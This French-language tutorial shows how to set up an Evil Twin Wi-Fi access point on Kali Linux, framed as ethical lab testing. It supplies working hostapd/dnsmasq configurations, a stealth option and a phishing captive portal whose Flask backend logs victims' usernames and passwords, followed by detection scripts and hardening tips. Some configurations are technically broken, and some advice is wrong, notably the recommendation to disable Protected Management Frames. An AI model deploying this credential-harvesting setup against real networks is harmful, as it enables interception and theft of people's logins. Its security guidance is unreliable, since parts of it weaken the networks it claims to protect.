1️⃣ Introduction à l’Attaque Evil Twin 📡
Ce tutoriel premium vous guide pour simuler une attaque MITM (Man-in-the-Middle) en créant un point d’accès Wi-Fi malveillant (Evil Twin) avec Kali Linux. Vous clonerez un réseau Wi-Fi légitime, attirerez des clients en lab, capturerez leurs identifiants via un portail captif 2.0, et analyserez les données avec des outils forensiques. Des scripts automatisés détecteront les Evil Twins, et vous apprendrez à sécuriser les réseaux avec WPA3-Enterprise. Compatible Wi-Fi 6 (802.11ax), ce tuto est conçu pour un usage éthique en lab.
Objectifs
- Configurer un Evil Twin avec Kali Linux.
- Capturer des identifiants via un portail captif avancé.
- Détecter les Evil Twins avec des scripts automatisés.
- Sécuriser les réseaux contre les attaques MITM.
2️⃣ Setup du Lab Pro 🔧
Configurez un lab isolé avec une topologie réseau pour tester l’attaque Evil Twin en sécurité.
+-----------------------------------------+
| [Réseau Lab Isolé] |
| | |
| v |
| [Kali Linux: 192.168.1.101] |
| | (Evil Twin AP: wlan1) |
| v |
| [Client Test: 192.168.1.102] |
| | |
| [Routeur Légitime: 192.168.1.1] |
+-----------------------------------------+
Variables d’Environnement
# Définir dans ~/.bashrc sur Kali
export KALI_IP=192.168.1.101
export CLIENT_IP=192.168.1.102
export TARGET_SSID="LabWiFi"
export TARGET_CHANNEL=36
export WLAN_IFACE=wlan1
export LEGIT_BSSID="00:11:22:33:44:55"
Matériel et Logiciels
- PC: VirtualBox, VM Kali Linux 2024.4.
- Adaptateur Wi-Fi: USB Wi-Fi 6 (ex. Netgear A8000, chipset MediaTek MT7921).
- Client Test: Smartphone ou PC avec Wi-Fi (ex. Ubuntu VM).
- Routeur: Wi-Fi 6 (ex. TP-Link Archer AX10).
- Logiciels: Python 3.12, hostapd, dnsmasq, wireshark, flask, mitmproxy, scapy, kismet, tcpdump, openssl.
Configuration
- Kali Linux VM:
# Configurer IP: $KALI_IP sudo apt update && sudo apt install hostapd dnsmasq wireshark python3 python3-pip mitmproxy kismet tcpdump openssl pip3 install flask scapy # Vérifier adaptateur iwconfig - Client Test:
# Configurer IP statique sudo nano /etc/netplan/01-netcfg.yaml network: ethernets: enp0s3: addresses: [$CLIENT_IP/24] gateway4: 192.168.1.1 sudo netplan apply - Routeur Légitime:
Configurez un SSID (
$TARGET_SSID) sur le canal$TARGET_CHANNEL(ex. 36 pour 5 GHz). Notez le BSSID légitime aveciwlist wlan0 scan.
3️⃣ Créer l’Evil Twin 📡
Configurer Hostapd (Karma Attack Wi-Fi 2025)
Adaptez pour Wi-Fi 6 avec une configuration sécurisée simulant un réseau moderne.
# hostapd.conf
interface=$WLAN_IFACE
driver=nl80211
ssid=$TARGET_SSID
hw_mode=ax
channel=$TARGET_CHANNEL
ieee80211ax=1
sae_require_mfp=1
wpa=2
wpa_passphrase=SecurePass2025
wpa_key_mgmt=WPA-PSK SAE
wpa_pairwise=CCMP
rsn_pairwise=CCMP
# Lancer hostapd
sudo hostapd hostapd.conf
Configurer Dnsmasq
# dnsmasq.conf
interface=$WLAN_IFACE
dhcp-range=192.168.1.150,192.168.1.200,12h
address=/login.page/192.168.1.101
# Lancer dnsmasq
sudo dnsmasq -C dnsmasq.conf
Configurer Réseau
# Activer mode monitor
sudo airmon-ng start $WLAN_IFACE
# Configurer IP
sudo ifconfig $WLAN_IFACE 192.168.1.101 netmask 255.255.255.0 up
# Activer routage
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Mode Apache (Furtif)
Réduisez la puissance de transmission pour des tests discrets.
# script.py
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--stealth', action='store_true')
args = parser.parse_args()
if args.stealth:
os.system(f"iwconfig {WLAN_IFACE} txpower 5")
# Lancer
python3 script.py --stealth
4️⃣ Capturer les Identifiants 🔍
Portail Captif 2.0
Améliorez le phishing avec une détection Wi-Fi 6 et un badge visuel.
# login.html
<!DOCTYPE html>
<html>
<head>
<title>Connexion Wi-Fi</title>
<style>
body { background: #1a1a1a; color: #f0f0f5; font-family: 'Courier New', monospace; text-align: center; }
input { background: #4a4a4a; color: #f0f0f5; border: 2px solid #8a2be2; padding: 10px; }
button { background: #8a2be2; color: #1a1a1a; padding: 10px 20px; border: none; border-radius: 5px; }
#wifi6-badge { display: none; color: #39ff14; font-weight: bold; }
</style>
</head>
<body>
<h1>Connexion au Wi-Fi</h1>
<p id="wifi6-badge">Wi-Fi 6 sécurisé</p>
<form action="/submit" method="POST">
<input type="text" name="username" placeholder="Identifiant"><br><br>
<input type="password" name="password" placeholder="Mot de passe"><br><br>
<button type="submit">Connexion</button>
</form>
<script>
if (navigator.connection && navigator.connection.effectiveType === 'wifi') {
document.getElementById("wifi6-badge").style.display = "block";
}
</script>
</body>
</html>
Script Flask
# capture.py
from flask import Flask, request, render_template
app = Flask(__name__, template_folder='.')
@app.route('/')
def index():
return render_template('login.html')
@app.route('/submit', methods=['POST'])
def submit():
username = request.form.get('username')
password = request.form.get('password')
with open('creds.txt', 'a') as f:
f.write(f"Username: {username}, Password: {password}\n")
return "Connexion réussie !"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
# Lancer
sudo python3 capture.py
Interface Néon
Accédez à http://$KALI_IP:80 pour voir le portail. Les identifiants sont logués dans creds.txt.
5️⃣ Détection d’Evil Twin 🕵️
Détection Automatisée
Comparez les BSSID pour identifier les Evil Twins.
# detect_evil.py
from scapy.all import *
def analyze(pkt):
if pkt.haslayer(Dot11Beacon):
if pkt.info.decode() == "$TARGET_SSID" and pkt.addr2 != "$LEGIT_BSSID":
print(f"[!] Evil Twin détecté: {pkt.addr2}")
sniff(iface="$WLAN_IFACE", prn=analyze)
# Lancer
sudo python3 detect_evil.py
Détection de Faux Positifs
# fake_ap_detector.py
import scapy.all as scapy
def callback(pkt):
if pkt.haslayer(scapy.Dot11ProbeResp) and pkt.addr2.lower() == "00:11:22:33:44:55":
print("Faux point d'accès détecté!")
scapy.sniff(iface="$WLAN_IFACE", prn=callback)
# Lancer
sudo python3 fake_ap_detector.py
Comparatif des Outils
| Outil | Détection BSSID | WPA3 Support | Prix |
|---|---|---|---|
| Kismet | Oui | Oui | Gratuit |
| Wireshark | Manuel | Non | Gratuit |
| AirDefense | Auto | Oui | Payant |
6️⃣ Analyse Forensique 🔍
Analyse des Logs
Identifiez les identifiants critiques (ex. admin).
# analyze_creds.py
import re
with open("creds.txt") as f:
for line in f:
if re.match(r".*admin.*", line, re.I):
print(f"[DEBUG] {line.strip()}")
# Lancer
python3 analyze_creds.py
Détection d’Anomalies
Surveillez les connexions HTTP suspectes.
# Surveiller
sudo tcpdump -i $WLAN_IFACE 'tcp port 80 && (tcp[20:2] = 0x504f || tcp[20:2] = 0x5055)'
Analyse Wireshark
# Capturer
wireshark -i $WLAN_IFACE -k
# Filtre
http.request.method == "POST"
7️⃣ Sécurisation Renforcée 🛡️
Bonnes Pratiques
- WPA3: Utiliser WPA3-SAE ou Enterprise.
- SSID Caché: Désactiver la diffusion du SSID.
- MAC Filtering: Restreindre l’accès aux appareils autorisés.
- VPN: Chiffrer le trafic avec un VPN.
WPA3-Enterprise
# hostapd-wpa3-enterprise.conf
interface=wlan0
driver=nl80211
ssid=SecureLabWiFi
hw_mode=ax
channel=36
ieee80211ax=1
wpa=2
wpa_key_mgmt=SAE
eap_server=1
eap_user_file=/etc/hostapd/hostapd.eap_user
# hostapd.eap_user
"testuser" PEAP,MSCHAPV2 "testpass" [2]
# Lancer
sudo hostapd hostapd-wpa3-enterprise.conf
Déploiement de Certificats
# Générer certificat
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
Monitoring des Performances
# stats.sh
#!/bin/bash
while true; do
echo "Clients connectés: $(iw dev $WLAN_IFACE station dump | grep -c Station)"
sleep 5
done
# Lancer
bash stats.sh
8️⃣ Rapport Professionnel 📊
## Rapport de Test MITM
- **Cible**: $TARGET_SSID
- **Durée**: 2h
- **Identifiants Capturés**: 3
- **Recommandations**:
- Activer WPA3-Enterprise
- Désactiver PMF (Protected Management Frames)
- Utiliser des certificats VLAN
- Déployer Kismet pour la détection
9️⃣ Checklist Éthique ⚖️
- Lab Only: Tests en environnement isolé.
- Légalité: Pas d’attaque sans autorisation écrite.
- Consentement: Autorisation pour tout réseau testé.
- Logs: Conserver les captures Wireshark et creds.txt pour audit.
# Modèle autorisation
Je, [Nom], autorise [Ton Nom] à tester une attaque MITM sur [Réseau] en lab. Date: [Date]. Signature: [Signature].
10️⃣ FAQ Apache ❓
Q: Puis-je tester sur WPA3 ?
A: Oui, mais WPA3 est plus résistant. Testez avec WPA2 pour des scénarios réalistes.
Q: Mon adaptateur ne supporte pas Wi-Fi 6 ?
A: Utilisez un adaptateur compatible (ex. MediaTek MT7921).
Q: Comment éviter les déconnexions ?
A: Augmentez la puissance avec iwconfig $WLAN_IFACE txpower 30.